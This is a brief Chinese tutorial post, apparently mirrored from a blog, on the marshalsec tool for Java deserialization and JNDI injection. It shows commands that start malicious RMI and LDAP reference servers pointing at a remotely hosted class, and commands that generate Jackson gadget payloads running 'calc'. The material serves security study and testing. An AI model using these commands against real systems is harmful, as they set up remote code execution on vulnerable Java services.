zoukankan      html  css  js  c++  java

  • # marshalsec使用

    开启rmi服务,恶意类放到服务上

    D:jdk_1.8injava.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099

    开启ldap服务

    D:jdk_1.8injava.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389

    参考链接
    列出所有jackson的gadgets传参为calc

    D:jdk_1.8injava.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a exploit.exec="calc"

    Alt text
    所有支持的组件
    Alt text
    所有支持的gadgets
    Alt text
    Alt text
    如果想查找组件可以生成的gadgets有哪些
    以Jackson为例

    D:jdk_1.8injava.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson

    Alt text
    如果想查找gadgets可以用于哪些组件生成
    1、以resin为例,可以查看手册
    Alt text
    2、选择想看的gadgets->find usages
    Alt text
    参考链接
  • 相关阅读:
    jvm05
    jvm04
    jvm03
    jvm02
    jvm01
    rabbitmq-01
    lock接口认识及可重入锁的实现
    volitile的使用
    自旋锁,死锁与重入锁
    上机实验4--求序列的最大元素和最小元素
  • 原文地址:https://www.cnblogs.com/afanti/p/11266087.html
Copyright © 2011-2022 走看看